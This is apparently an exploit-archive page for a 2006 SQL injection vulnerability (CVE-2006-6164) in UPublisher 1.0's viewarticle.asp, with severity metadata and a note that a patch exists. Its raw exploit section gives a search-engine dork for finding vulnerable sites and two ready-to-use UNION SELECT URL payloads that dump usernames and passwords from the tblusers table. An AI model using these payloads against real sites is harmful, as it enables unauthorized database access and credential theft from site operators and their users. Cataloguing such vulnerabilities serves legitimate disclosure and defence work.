header-logo
Suggest Exploit
vendor:
UPublisher
by:
ajann
9,3
CVSS
HIGH
SQL Injection
89
CWE
Product Name: UPublisher
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: CVE-2006-6164
CPE: a:superfreaker:upublisher:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2006

UPublisher 1.0 (viewarticle.asp) Remote SQL Injection Vulnerability

UPublisher 1.0 is vulnerable to a remote SQL injection attack. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. This can allow an attacker to gain access to the database and potentially gain access to sensitive information.

Mitigation:

The vendor has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

*******************************************************************************
# Title  :  UPublisher 1.0 (viewarticle.asp) Remote SQL Injection
Vulnerability
# Author :   ajann
# Dork   :   UPublisher
# Vendor: http://www.superfreaker.com/


*******************************************************************************

###http://[target]/[path]//viewarticle.asp?ID=[SQL]

Example:

//viewarticle.asp?ID=-1%20union%20select%200,password,username,0,0,0,0%20from%20tblusers
OR ---
//viewarticle.asp?ID=-1%20union%20select%200,0,username,password,0,0,0,0,0%20from%20tblusers

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-11-12]